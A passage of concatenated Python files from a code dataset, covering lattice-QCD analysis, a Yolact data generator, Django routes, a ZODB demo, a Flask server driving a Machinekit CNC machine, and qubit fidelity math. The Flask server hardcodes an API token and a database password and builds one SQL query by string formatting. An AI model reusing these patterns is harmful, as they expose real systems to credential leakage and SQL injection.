usecols=(2,3,4,5,6,7,8,9))\n arr=np.array(list(map(lambda x: [ complex(x[0],x[1]), complex(x[2],x[3]), complex(x[4],x[5]), complex(x[6],x[7]) ] , arr)))\n arr=arr.reshape(parameters['T'], 4, 4)\n arr_proj=np.array(list(map(lambda x: (matr(Proj)*matr(x)).trace().item() , arr)))\n twopRaw_mom0.append(arr_proj.real)\n\n twopRaw_mom0=np.array(twopRaw_mom0).reshape(lenConf,parameters['T'])\n twopBinning_mom0=au.binning(twopRaw_mom0, parameters['binsize'])\n Nbins=len(twopBinning_mom0)\n massEffBinning=au.effMass(twopBinning_mom0)\n meanEffMass=np.average(massEffBinning,axis=0)\n errEffMass=sqrt(Nbins-1) * np.std(massEffBinning,axis=0)\n massBin=[]\n for Arr in massEffBinning:\n Lw=parameters['fitMassLow']\n Hg=parameters['fitMassHgh']\n popt,pconv = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), Arr[Lw:Hg+1] , sigma=errEffMass[Lw:Hg+1])\n massBin.append(popt[0])\n\n EnerBin=sqrt(np.array(massBin)**2 + (parameters['momentum']*(2.*PI/parameters['L']))**2 )\n\n # read the twop point functions for non zero momentum\n twopRaw_momi=[]\n for iconf in listConfs:\n for lM,li in zip(lMomenta, ldir):\n twopName = parameters['twop'] + iconf + '/twop_proton_mom_' + lM[0] + '_' + lM[1] + '_' + lM[2] + '_zeta_-0.6000_dir_' + li + '.dat'\n lenFile = au.file_len(twopName)\n explen = parameters['T'] * 4\n if lenFile != explen:\n sys.stderr.write('Error wrong number of lines in %s' % (twopName))\n sys.exit(-1)\n arr=np.loadtxt(twopName, usecols=(2,3,4,5,6,7,8,9))\n arr=np.array(list(map(lambda x: [ complex(x[0],x[1]), complex(x[2],x[3]), complex(x[4],x[5]), complex(x[6],x[7]) ] , arr)))\n arr=arr.reshape(parameters['T'], 4, 4)\n arr_proj=np.array(list(map(lambda x: (matr(Proj)*matr(x)).trace().item() , arr)))\n twopRaw_momi.append(arr_proj.real)\n\n 
twopRaw_momi=np.array(twopRaw_momi).reshape(lenConf,len(ldir),parameters['T'])\n\n twopBinning_momi=np.array(au.binning(twopRaw_momi, parameters['binsize']))\n Nbins=len(twopBinning_momi)\n\n #read the three point functions\n # convention of the format\n# 2,3-> dpart (re,im) +z\n# 4,5-> dpart (re,im) -z\n# 6,7-> upart (re,im) +z\n# 8,9-> upart (re,im) -z\n NDZ=int(parameters['L']/2)\n threep=[]\n for iconf in listConfs:\n for lM,li,lPr in zip(lMomenta, ldir, lProj):\n threepName = parameters['threep'] + iconf + '/threep_mom_' + lM[0] + '_' + lM[1] + '_' + lM[2] + '_zeta_-0.6000_dir_' + li + '_proj_' + lPr + '.dat'\n lenFile = au.file_len(threepName)\n explen = parameters['T'] * NDZ\n if lenFile != explen:\n sys.stderr.write('Error wrong number of lines in %s' % (threepName))\n sys.exit(-1)\n arr=np.loadtxt(threepName, usecols=(2,3,4,5,6,7,8,9))\n arr=np.array(list(map(lambda x: [ complex(x[0],x[1]), complex(x[2],x[3]), complex(x[4],x[5]), complex(x[6],x[7]) ] , arr))) # make complex\n arr=np.array(list(map(lambda x: [ x[2]-x[0], x[3]- x[1] ] , arr))) # create isovector combination\n threep.append(arr)\n threep=np.array(threep).reshape(lenConf, len(ldir), parameters['T'], NDZ, 2)\n\n threepBinning = np.array(au.binning(threep, parameters['binsize']))\n\n # create the ratio\n ratioBinning=np.zeros(threepBinning.shape, dtype=np.complex128)\n for ibin in range(Nbins):\n for dir in range(len(ldir)):\n if ldir[dir] == 'x':\n ip=0\n elif ldir[dir] == 'y':\n ip=1\n elif ldir[dir] == 'z':\n ip=2\n else:\n sys.exit(-1)\n nP=int(lMomenta[dir][ip])\n C=(2*massBin[ibin]**2) / (EnerBin[ibin]*(EnerBin[ibin]+massBin[ibin])) \n factor=I*(2*massBin[ibin]**2)/ ((EnerBin[ibin]*massBin[ibin]+massBin[ibin]**2+(nP*(2.*PI/parameters['L']))**2)*C)\n for it in range(parameters['T']):\n for idz in range(NDZ):\n for fd in range(2):\n ratioBinning[ibin, dir, it, idz, fd] = factor * (threepBinning[ibin, dir, it, idz, fd] / twopBinning_momi[ibin, dir, parameters['tsink']])\n\n ratio_bmean=np.average(ratioBinning, axis=0)\n errRatio=sqrt(Nbins-1) * ( np.std(ratioBinning.real, axis=0) + 1j*np.std(ratioBinning.imag, axis=0) )\n\n h_MA=[]\n for ibin in range(Nbins):\n for dir in range(len(ldir)):\n for idz in range(NDZ):\n for fd in range(2):\n Lw=parameters['fitThpLow']\n Hg=parameters['fitThpHgh']\n popt_r, pconv_r = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), ratioBinning[ibin,dir,Lw:Hg+1,idz,fd].real , sigma=errRatio[dir,Lw:Hg+1,idz,fd].real)\n popt_i, pconv_i = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), ratioBinning[ibin,dir,Lw:Hg+1,idz,fd].imag , sigma=errRatio[dir,Lw:Hg+1,idz,fd].imag)\n h_MA.append(popt_r[0] + 1j*popt_i[0])\n\n h_MA=np.array(h_MA).reshape(Nbins,len(ldir),NDZ,2)\n h_MA_bmean=np.average(h_MA,axis=0)\n err_h_MA=sqrt(Nbins-1) * ( np.std(h_MA.real, axis=0) + 1j*np.std(h_MA.imag, axis=0) )\n\n\n\n for dir in range(len(ldir)):\n for idz in range(NDZ):\n print('%d %d \\t %+e %+e \\t %+e %+e' % (dir, -idz, h_MA_bmean[dir,idz,1].real, err_h_MA[dir,idz,1].real, h_MA_bmean[dir,idz,1].imag, err_h_MA[dir,idz,1].imag) )\n for idz in range(NDZ):\n print('%d %d \\t %+e %+e \\t %+e %+e' % (dir, idz, h_MA_bmean[dir,idz,0].real, err_h_MA[dir,idz,0].real, h_MA_bmean[dir,idz,0].imag, err_h_MA[dir,idz,0].imag) )\n print('\\n')\n\n\n ratioBinningAver=( (ratioBinning[:, 0, :, :, :].real + ratioBinning[:, 1, :, :, :].real + ratioBinning[:, 2, :, :, :].real + (ratioBinning[:, 3, :, :, :].real + ratioBinning[:, 4, :, :, :].real + ratioBinning[:, 5, :, :, :].real)) + 1j*(ratioBinning[:, 0, :, :, :].imag + ratioBinning[:, 
1, :, :, :].imag + ratioBinning[:, 2, :, :, :].imag - (ratioBinning[:, 3, :, :, :].imag + ratioBinning[:, 4, :, :, :].imag + ratioBinning[:, 5, :, :, :].imag)) )/6\n\n ratioAver_bmean=np.average(ratioBinningAver, axis=0)\n errRatioAver=sqrt(Nbins-1) * ( np.std(ratioBinningAver.real, axis=0) + 1j*np.std(ratioBinningAver.imag, axis=0) )\n\n h_MA=[]\n for ibin in range(Nbins):\n for idz in range(NDZ):\n for fd in range(2):\n Lw=parameters['fitThpLow']\n Hg=parameters['fitThpHgh']\n popt_r, pconv_r = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), ratioBinningAver[ibin,Lw:Hg+1,idz,fd].real , sigma=errRatioAver[Lw:Hg+1,idz,fd].real)\n popt_i, pconv_i = curve_fit(lambda x,a: a, np.arange(Lw, Hg+1), ratioBinningAver[ibin,Lw:Hg+1,idz,fd].imag , sigma=errRatioAver[Lw:Hg+1,idz,fd].imag)\n h_MA.append(popt_r[0] + 1j*popt_i[0])\n\n h_MA=np.array(h_MA).reshape(Nbins,NDZ,2)\n h_MA_bmean=np.average(h_MA,axis=0)\n err_h_MA=sqrt(Nbins-1) * ( np.std(h_MA.real, axis=0) + 1j*np.std(h_MA.imag, axis=0) )\n\n print('average')\n for idz in range(NDZ):\n print('%d \\t %+e %+e \\t %+e %+e' % (-idz, h_MA_bmean[idz,1].real, err_h_MA[idz,1].real, h_MA_bmean[idz,1].imag, err_h_MA[idz,1].imag) )\n for idz in range(NDZ):\n print('%d \\t %+e %+e \\t %+e %+e' % (idz, h_MA_bmean[idz,0].real, err_h_MA[idz,0].real, h_MA_bmean[idz,0].imag, err_h_MA[idz,0].imag) )\n\n # print real part\n plt.figure()\n if au.which('latex'):\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif')\n\n plt.ylabel(r\"Re[h]\")\n plt.xlabel(r\"z\")\n plt.errorbar(np.arange(-NDZ+1,NDZ) , np.concatenate((np.flipud(h_MA_bmean[:,1].real), h_MA_bmean[1:,0].real)) , yerr=np.concatenate((np.flipud(err_h_MA[:,1].real), err_h_MA[1:,0].real)), fmt='o', color='red')\n plt.savefig('PDFs_helicity_real_Nc'+str(lenConf)+'ts'+str(parameters['tsink'])+'mom'+str(parameters['momentum'])+'.pdf', format='pdf')\n\n\n # print imaginary part\n # flip +z <-> -z\n plt.figure()\n if au.which('latex'):\n plt.rc('text', usetex=True)\n plt.rc('font', family='serif') \n plt.ylabel(r\"Im[h]\")\n plt.xlabel(r\"z\")\n plt.errorbar(np.arange(-NDZ+1,NDZ) , np.flipud(np.concatenate((np.flipud(h_MA_bmean[:,1].imag), h_MA_bmean[1:,0].imag))) , yerr=np.flipud(np.concatenate((np.flipud(err_h_MA[:,1].imag), err_h_MA[1:,0].imag))), fmt='o', color='red')\n plt.savefig('PDFs_helicity_imag_Nc'+str(lenConf)+'ts'+str(parameters['tsink'])+'mom'+str(parameters['momentum'])+'.pdf', format='pdf')\n\n############################ \nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"PDFs_helicity.py","file_name":"PDFs_helicity.py","file_ext":"py","file_size_in_byte":13497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"217505306","text":"import os, sys\nROOT_DIR = os.path.abspath(\"../\")\nsys.path.append(ROOT_DIR)\n#from skimage import draw\nimport MaskRCNNExperiment.GeometryDataset_on_the_fly_gen as euclidea_datagen\n#import YolactExperiment.data.coco as cocodataset\n\nfrom YolactExperiment.utils.augmentations import *\nimport numpy as np\nimport torch\nimport torch.utils.data as data\nfrom enviroment_utils import EnvironmentUtils as env_utils\n\nclass Yolact_datagen(data.Dataset):\n\n def __init__(self, args):\n self.euclidea = euclidea_datagen.GeometryDataset_on_the_fly_gen(args)\n self.transform = BaseTransform()\n self.len = args.epoch_size\n self.name= \"euclidea\"\n def __len__(self):\n return self.len\n def __getitem__(self, index):\n \"\"\"\n Args:\n index (int): Index\n Returns:\n tuple: Tuple (image, (target, masks, 
num_crowds)).\n target is the object returned by ``coco.loadAnns``.\n \"\"\"\n im, gt, masks, h, w, num_crowds = self.pull_item(index)\n return im, (gt, masks, num_crowds)\n def pull_item(self, index):\n index = int(index)\n img, masks, classes = self.load_image_and_mask(index)\n\n #vizualization: to check images before\n #from mrcnn import visualize\n #im = visualize.display_top_masks(img, masks, classes, list(self.euclidea.id_name_dic.keys()))\n #im.close()\n\n #derive bboxes\n bboxes = self.extract_bboxes(masks)\n # IS it LIKE this or 2,1,0 ???\n masks = masks.transpose((2, 0, 1))\n num_crowds = 0\n height, width, _ = img.shape\n scale = np.array([width, height, width, height])\n target = []\n for i in range(len(classes)):\n bbox = bboxes[i]\n final_box = list(bbox/scale)\n final_box.append(classes[i])\n target.append(final_box)\n\n if self.transform is not None:\n if len(target) > 0:\n target = np.array(target)\n img, masks, boxes, labels = self.transform(img, masks, target[:, :4],\n {'num_crowds': 0, 'labels': classes})\n\n # I stored num_crowds in labels so I didn't have to modify the entirety of augmentations\n num_crowds = labels['num_crowds']\n labels = labels['labels']\n\n target = np.hstack((boxes, np.expand_dims(labels, axis=1)))\n return torch.from_numpy(img).permute(2, 0, 1), target, masks, height, width, num_crowds\n\n def load_image_and_mask(self, image_id):\n self.euclidea.number_of_images += 1\n self.euclidea.step_index += 1\n if self.euclidea.done_level:\n self.euclidea.reset_level()\n\n action_tool, action_points = self.euclidea.multi_level.get_construction(self.euclidea.step_index)\n\n if action_tool is None and action_points is None:\n print(\"error in generation\")\n self.euclidea.reset_level()\n self.euclidea.number_of_errors += 1\n action_tool, action_points = self.euclidea.multi_level.get_construction(self.euclidea.step_index)\n\n action_tool_network_index = self.euclidea.id_name_dic[self.euclidea.multi_level.tool_index_to_name[action_tool]]\n\n img = env_utils.build_image_from_multilevel(self.euclidea.multi_level, self.euclidea.history)\n self.euclidea.history.append(img[:, :, 0])\n self.euclidea.execute_action(action_tool, action_points)\n masks, classes = self.euclidea.procces_mask(action_points, action_tool_network_index)\n\n return img, masks, classes\n\n @staticmethod\n def extract_bboxes(masks):\n boxes = np.zeros([masks.shape[-1], 4], dtype=np.int32)\n for i in range(masks.shape[-1]):\n m = masks[:, :, i]\n # Bounding box.\n horizontal_indicies = np.where(np.any(m, axis=0))[0]\n #print(\"np.any(m, axis=0)\", np.any(m, axis=0))\n #print(\"p.where(np.any(m, axis=0))\", np.where(np.any(m, axis=0)))\n vertical_indicies = np.where(np.any(m, axis=1))[0]\n\n if horizontal_indicies.shape[0]:\n x1, x2 = horizontal_indicies[[0, -1]]\n y1, y2 = vertical_indicies[[0, -1]]\n x2 += 1\n y2 += 1\n else:\n x1, x2, y1, y2 = 0, 0, 0, 0\n boxes[i] = np.array([x1, y1, x2, y2])\n\n\n\n return boxes.astype(np.int32)\n def __repr__(self):\n fmt_str = 'Dataset ' + self.__class__.__name__ + '\\n'\n fmt_str += ' Number of datapoints: {}\\n'.format(self.__len__())\n fmt_str += ' Root Location: {}\\n'.format(self.root)\n tmp = ' Transforms (if any): '\n fmt_str += '{0}{1}\\n'.format(tmp, self.transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n tmp = ' Target Transforms (if any): '\n fmt_str += '{0}{1}'.format(tmp, self.target_transform.__repr__().replace('\\n', '\\n' + ' ' * len(tmp)))\n return 
fmt_str","sub_path":"src/YolactExperiment/euclidea_datagen.py","file_name":"euclidea_datagen.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"505208223","text":"from django.urls import path\n\nfrom main.views import *\n\nurlpatterns = [\n    path('', home_page, name='index'),\n    path('features', features, name='features'),\n    path('faq', faq, name='faq'),\n    path('about-us', about_us, name='about-us'),\n    path('contact-us', contact_us, name='contact-us'),\n    path('gallery', gallery, name='gallery'),\n    path('courses', courses, name='courses'),\n    path('profile', profile, name='profile'),\n    path('contact', contact, name='contact'),\n]","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"417290724","text":"#!/usr/bin/env python3\n# -*-coding: utf-8-*-\n# Author : Chris\n# Blog : http://blog.chriscabin.com\n# GitHub : https://www.github.com/chrisleegit\n# File : zodb_demo.py\n# Date : 16-7-15\n# Version: 0.1\n# Description: \n\nfrom ZODB import FileStorage, DB\nimport transaction\n\n\nclass Database:\n    def __init__(self, db_file='db.fs'):\n        # `FileStorage` is really a proxy object that maps a database onto a plain text file.\n        # These are the usual steps for using ZODB.\n        self._storage = FileStorage.FileStorage(db_file)\n        self._db = DB(self._storage)\n        self._root = self._db.open().root()\n\n    @property\n    def root(self):\n        return self._root\n\n    def store(self, close=False):\n        transaction.commit()\n        if close:\n            self.close()\n\n    def close(self):\n        self._storage.close()\n\n    def query_all(self):\n        for k in self._root.keys():\n            print('{} => {}'.format(k, self._root[k]))\n\n\ndef main():\n    # Create a database and store some stuff\n    stuff_db = Database('stuff.fs')\n\n    # Store objects the same way as with `shelve`\n    stuff_db.root['foo1'] = 'foo bar hello, world'\n    stuff_db.root['foo2'] = {'hello': 'world'}\n    stuff_db.root['foo3'] = [[1, 2, 3, 4], 'hello']\n\n    stuff_db.query_all()\n\n    # Commit and close the database\n    stuff_db.store(close=True)\n    del stuff_db\n\n    # Reopen the database\n    stuff_db_read = Database('stuff.fs')\n\n    # Inspect the stored data\n    stuff_db_read.query_all()\n\n    # Modify some data, then close and read it again\n    stuff_db_read.root['foo1'] = 'Boy'\n\n    stuff_db_read.store(True)\n\n    # Read it back and inspect\n    Database('stuff.fs').query_all()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"ch17/zodb/zodb_demo.py","file_name":"zodb_demo.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"349682003","text":"import os\nimport sys\nimport json\nimport logging\nimport linuxcnc\nimport time\nfrom flask_cors import CORS\nfrom flask_mysqldb import MySQL\nfrom werkzeug.utils import secure_filename\nfrom classes.machinekitController import MachinekitController\nfrom flask import Flask, request, jsonify, flash, redirect, url_for, send_from_directory\n# halcmd setp hal_manualtoolchange.change_button true\n\napp = Flask(__name__)\nCORS(app)\n\napp.config['MYSQL_HOST'] = 'localhost'\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'machinekit'\napp.config['MYSQL_DB'] = 'machinekit'\napi_token = \"test_secret\"\n\nmysql = MySQL(app)\n\nUPLOAD_FOLDER = '/home/machinekit/devel/webUI/files'\nALLOWED_EXTENSIONS = set(['nc'])\n\nport = 12345\n
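\n# Illustrative request against this API (the host is a placeholder; the\n# API_KEY header must match api_token above):\n#\n#   curl -H \"API_KEY: test_secret\" http://<host>:5000/status\n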
\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.WARNING)\nfile_handler = logging.FileHandler('logfile.log')\nformatter = logging.Formatter(\n    '%(asctime)s : %(levelname)s : %(name)s : %(message)s')\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\nfile_queue = []\n\ntry:\n    controller = MachinekitController()\nexcept Exception as e:\n    print(\"Machinekit is not running\")\n    logger.critical(e)\n    sys.exit(1)\n\n\ndef auth(f):\n    \"\"\" Decorator that checks the request's API key before calling the route.\"\"\"\n    def wrapper(*args, **kwargs):\n        headers = request.headers\n        auth = headers.get(\"API_KEY\")\n        if auth != api_token:\n            return jsonify({\"errors\": \"Not authorized\"}), 400\n        else:\n            return f(*args, **kwargs)\n    wrapper.__name__ = f.__name__\n    return wrapper\n\n\n@app.route(\"/status\", methods=[\"GET\"])\n@auth\ndef get_axis():\n    try:\n        return jsonify(controller.get_all_vitals())\n    except (Exception) as e:\n        if str(e) == \"emcStatusBuffer invalid err=3\":\n            logger.critical(e)\n            return jsonify(\n                {\"errors\": \"Machinekit is not running please restart machinekit and then the server\"}), 400\n        logger.critical(e)\n        return jsonify({\n            \"errors\": str(e)\n        }), 400\n\n\n@app.route(\"/position\", methods=[\"GET\"])\n@auth\ndef get_position():\n    try:\n        return jsonify(controller.axes_position())\n    except (Exception) as e:\n        if str(e) == \"emcStatusBuffer invalid err=3\":\n            logger.critical(e)\n            return jsonify(\n                {\"errors\": \"Machinekit is not running please restart machinekit and then the server\"}), 400\n        logger.critical(e)\n        return jsonify({\n            \"errors\": str(e)\n        }), 400\n\n\n@app.route(\"/return_files\", methods=[\"GET\"])\n@auth\ndef return_files():\n    try:\n        cur = mysql.connection.cursor()\n        cur.execute(\"\"\"\n        SELECT * FROM files\n        \"\"\")\n        result = cur.fetchall()\n        return jsonify({\"result\": result, \"file_queue\": file_queue})\n\n    except Exception as e:\n        return jsonify({\"errors\": str(e)}), 400\n\n\n@app.route(\"/set_machine_status\", methods=[\"POST\"])\n@auth\ndef set_status():\n    try:\n        data = request.json\n        command = data['command']\n        return jsonify(controller.machine_status(command))\n    except (KeyError, Exception) as e:\n        return jsonify({\n            \"errors\": str(e)\n        }), 400\n\n\n@app.route(\"/set_home\", methods=[\"POST\"])\n@auth\ndef set_home_axes():\n    try:\n        data = request.json\n        command = data['command']\n        if command == \"home\":\n            return jsonify(controller.home_all_axes())\n        else:\n            return jsonify(controller.unhome_all_axes())\n    except Exception as e:\n        return jsonify({\n            \"errors\": str(e)\n        }), 400\n\n\n@app.route(\"/control_program\", methods=[\"POST\"])\ndef control_program():\n    try:\n        data = request.json\n        command = data['command']\n        return jsonify(controller.run_program(command))\n    except Exception as e:\n        return jsonify({\n            \"errors\": str(e)\n        }), 400\n\n\n@app.route(\"/send_command\", methods=[\"POST\"])\n@auth\ndef send_command():\n    try:\n        data = request.json\n        command = data[\"mdi_command\"]\n        return jsonify(controller.mdi_command(command))\n    except (KeyError, Exception) as e:\n        return jsonify({\n            \"errors\": str(e)\n        }), 400\n\n\n@app.route(\"/manual\", methods=[\"POST\"])\n@auth\ndef manual():\n    try:\n        data = request.json\n        axes = data['axes']\n        speed = data['speed']\n        increment = data['increment']\n        return jsonify(controller.manual_control(axes, speed, increment))\n    except (KeyError, Exception) as e:\n        return jsonify({\n            \"errors\": str(e)\n        }), 400\n\n\n@app.route(\"/spindle\", methods=[\"POST\"])\n@auth\ndef spindle():\n    try:\n        data = request.json\n        command = data[\"command\"]\n        if \"spindle_brake\" in command:\n            return jsonify(controller.spindle_brake(command[\"spindle_brake\"]))\n        elif \"spindle_direction\" in command:\n            return 
jsonify(controller.spindle_direction(command[\"spindle_direction\"]))\n elif \"spindle_override\" in command:\n return jsonify(controller.spindleoverride(command[\"spindle_override\"]))\n else:\n return jsonify({\"error\": \"Unknown command\"})\n except(KeyError, Exception) as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/feed\", methods=[\"POST\"])\n@auth\ndef feed():\n try:\n data = request.json\n command = data[\"feedrate\"]\n return jsonify(controller.feedoverride(command))\n except(KeyError, Exception) as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/maxvel\", methods=[\"POST\"])\n@auth\ndef maxvel():\n try:\n data = request.json\n command = data[\"velocity\"]\n return jsonify(controller.maxvel(command))\n except(KeyError, Exception) as e:\n return jsonify({\n \"errors\": str(e)\n }), 400\n\n\n@app.route(\"/update_file_queue\", methods=[\"POST\"])\n@auth\ndef update_file_queue():\n try:\n global file_queue\n data = request.json\n new_queue = data[\"new_queue\"]\n file_queue = new_queue\n return jsonify({\"success\": \"Queue updated\"})\n except Exception as e:\n return jsonify({\"errors\": e}), 400\n\n\n@app.route(\"/tool_change\", methods=[\"GET\"])\n@auth\ndef tool_changer():\n try:\n # Dirty fix to bypass toolchange prompt\n os.system(\"halcmd setp hal_manualtoolchange.change_button true\")\n time.sleep(1)\n os.system(\"halcmd setp hal_manualtoolchange.change_button false\")\n return jsonify({\"success\": \"Command executed\"})\n except Exception as e:\n return jsonify({\"errors\": e}), 400\n\n\n@app.route(\"/open_file\", methods=[\"POST\"])\n@auth\ndef open_file():\n try:\n data = request.json\n path = data[\"path\"]\n return jsonify(controller.open_file(\"/home/machinekit/devel/webUI/files/\" + path))\n except Exception as e:\n return jsonify({\"errors\": e}), 400\n\n\n@app.route(\"/file_upload\", methods=[\"POST\"])\n@auth\ndef upload():\n try:\n if \"file\" not in request.files:\n return \"No file found\"\n\n file = request.files[\"file\"]\n filename = secure_filename(file.filename)\n cur = mysql.connection.cursor()\n cur.execute(\n \"\"\"\n SELECT * FROM files\n WHERE file_name = '%s' \"\"\" % filename)\n\n result = cur.fetchall()\n\n if len(result) > 0:\n return jsonify({\"errors\": \"File with given name already on server\"}), 400\n\n cur.execute(\"\"\"\n INSERT INTO files (file_name, file_location)\n VALUES (%s, %s)\n \"\"\", (filename, UPLOAD_FOLDER)\n )\n mysql.connection.commit()\n file.save(os.path.join(UPLOAD_FOLDER, filename))\n return jsonify(\"File added to database and saved to folder\")\n except Exception as e:\n return jsonify({\"errors\": e}), 400\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='192.168.1.116', port=5000)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313825577","text":"import numpy as np\nimport scipy as sp\nimport scipy.optimize\nimport pycqed.simulations.transmon as tm\n\n\ndef kron(*args):\n \"\"\"Variable input number Kronecker product.\n See also numpy.kron\n \"\"\"\n assert len(args) > 0\n res = args[0]\n for x in args[1:]:\n res = np.kron(res, x)\n return res\n\n\ndef calculate_idle_spec_fidelity(fqb, anh, specs, t, angular_units=False):\n \"\"\"Calculates process fidelity of an idling qubit due to residual couplings\n\n Args:\n fqb: float\n qubit frequency\n anh: float\n qubit anharmonicity\n specs: list[tuple[fqb_spec, 
anh_spec, j, ef]]\n fqb_spec: float\n spectator qubit frequency\n anh_spec: float\n spectator qubit anharmonicity\n j: float\n coupling rate to the spectator qubit\n ef: bool\n if the spectator qubit can also be in the f-state\n t: float\n interaction time\n angular_units: bool\n True if the inputs are specified in angular frequency, False for\n regular frequency (default False)\n Returns:\n Worst case (over spectator qubit states) process fidelity.\n \"\"\"\n zeta = np.array([0])\n for fqb_spec, anh_spec, j, ef in specs:\n zeta_spec_e = tm.transition_dispersive_shift(1, fqb, anh, fqb_spec,\n anh_spec, j)\n if ef:\n zeta_spec_f = tm.transition_dispersive_shift(1, fqb, anh, fqb_spec,\n anh_spec, j, 2)\n zeta = kron(zeta, [1, 1, 1]) + kron(np.ones_like(zeta),\n [0, zeta_spec_e, zeta_spec_f])\n else:\n zeta = kron(zeta, [1, 1]) + kron(np.ones_like(zeta),\n [0, zeta_spec_e])\n z_angle = (1 if angular_units else 2 * np.pi) * zeta * t\n return tm.cz_process_fidelity(z_angle).min()\n\n\ndef calculate_gate_spec_fidelity(fint, anh1, anh2, specs1, specs2, t_gate,\n angular_units=False):\n \"\"\"Calculates process fidelity of a CZ gate due to residual couplings\n\n Args:\n fint: float\n lower gate qubit frequency during the gate\n anh1: float\n lower gate qubit anharmonicity\n anh2: float\n higher gate qubit anharmonicity\n specs1: list[tuple[fqb_spec, anh_spec, j, ef]]\n fqb_spec: float\n frequency of spectator qubit to lower gate qubit\n anh_spec: float\n anharmonicity of spectator qubit to lower gate qubit\n j: float\n coupling rate to the spectator qubit to the lower gate qubit\n ef: bool\n if the spectator qubit can also be in the f-state\n specs2: list[tuple[fqb_spec, anh_spec, j, ef]]\n fqb_spec: float\n frequency of spectator qubit to higher gate qubit\n anh_spec: float\n anharmonicity of spectator qubit to higher gate qubit\n j: float\n coupling rate to the spectator qubit to the higher gate qubit\n ef: bool\n if the spectator qubit can also be in the f-state\n t_gate: float\n interaction time\n angular_units: bool\n True if the inputs are specified in angular frequency, False for\n regular frequency (default False)\n Returns:\n Worst case (over spectator qubit states) process fidelity.\n \"\"\"\n fqb1 = fint\n fqb2 = fint - anh2\n zeta1_ge = np.array([0])\n zeta2_ge = np.array([0])\n zeta2_ef = np.array([0])\n\n for fqb_spec, anh_spec, j_spec, ef in specs1:\n zeta_ge_spec_e = tm.transition_dispersive_shift(1, fqb1, anh1, fqb_spec,\n anh_spec, j_spec, 1)\n if ef:\n zeta_ge_spec_f = tm.transition_dispersive_shift(1, fqb1, anh1,\n fqb_spec, anh_spec,\n j_spec, 2)\n zeta1_ge = kron(zeta1_ge, [1, 1, 1]) + kron(np.ones_like(zeta1_ge),\n [0, zeta_ge_spec_e,\n zeta_ge_spec_f])\n zeta2_ge = kron(zeta2_ge, [1, 1, 1])\n zeta2_ef = kron(zeta2_ef, [1, 1, 1])\n else:\n zeta1_ge = kron(zeta1_ge, [1, 1]) + kron(np.ones_like(zeta1_ge),\n [0, zeta_ge_spec_e])\n zeta2_ge = kron(zeta2_ge, [1, 1])\n zeta2_ef = kron(zeta2_ef, [1, 1])\n\n for fqb_spec, anh_spec, j_spec, ef in specs2:\n zeta_ge_spec_e = tm.transition_dispersive_shift(1, fqb2, anh2, fqb_spec,\n anh_spec, j_spec, 1)\n zeta_ef_spec_e = tm.transition_dispersive_shift(2, fqb2, anh2, fqb_spec,\n anh_spec, j_spec, 1)\n if ef:\n zeta_ge_spec_f = tm.transition_dispersive_shift(1, fqb2, anh2,\n fqb_spec, anh_spec,\n j_spec, 2)\n zeta_ef_spec_f = tm.transition_dispersive_shift(2, fqb2, anh2,\n fqb_spec, anh_spec,\n j_spec, 2)\n zeta1_ge = kron(zeta1_ge, [1, 1, 1])\n zeta2_ge = kron(zeta2_ge, [1, 1, 1]) + kron(np.ones_like(zeta2_ge),\n [0, zeta_ge_spec_e,\n 
zeta_ge_spec_f])\n zeta2_ef = kron(zeta2_ef, [1, 1, 1]) + kron(np.ones_like(zeta2_ef),\n [0, zeta_ef_spec_e,\n zeta_ef_spec_f])\n else:\n zeta1_ge = kron(zeta1_ge, [1, 1])\n zeta2_ge = kron(zeta2_ge, [1, 1]) + kron(np.ones_like(zeta2_ge),\n [0, zeta_ge_spec_e])\n zeta2_ef = kron(zeta2_ef, [1, 1]) + kron(np.ones_like(zeta2_ef),\n [0, zeta_ef_spec_e])\n\n z1 = (1 if angular_units else 2 * np.pi) * zeta1_ge * t_gate\n z2 = (1 if angular_units else 2 * np.pi) * zeta2_ge * t_gate\n zc = (0.5 if angular_units else np.pi) * (zeta2_ef - zeta1_ge) * t_gate\n\n return tm.cz_process_fidelity(z1, z2, zc).min()\n\n\ndef calculate_step_fidelity(qubits, couplings, wints):\n \"\"\"Calculates the process fidelity for a step of parallel gates\n\n Args:\n qubits: dict[str, dict[str, any]]\n A dictionary from qubit names to properties. The following\n properties should be defined:\n neighbors: a set of qubit names that neighbor this qubit\n wq: qubit parking frequency\n anh: qubit anharmonicity (negative for transmon qubits)\n couplings: dict[frozenset[str], float]\n Qubit-qubit coupling rates. Keys are frozensets of coupled qubit\n names and values are the 01-10 coupling rates.\n wints: dict[frozenset[str], float]\n Interaction frequencies of gates that will be executed in parallel\n Return: dict[str, float]\n Worst-case process fidelity of each qubit in the parallel gate step.\n For qubits involved in gates, the total error is equally divided\n between the two qubits.\n \"\"\"\n active_qubits = {qn for g in wints for qn in g}\n inactive_qubits = {qn for qn in qubits if qn not in active_qubits}\n qubit_freqs = {qn: qubits[qn]['wq'] for qn in inactive_qubits}\n qubit_ef = {qn: False for qn in inactive_qubits}\n step_time = 0\n fidelities = {}\n for g in wints:\n step_time = 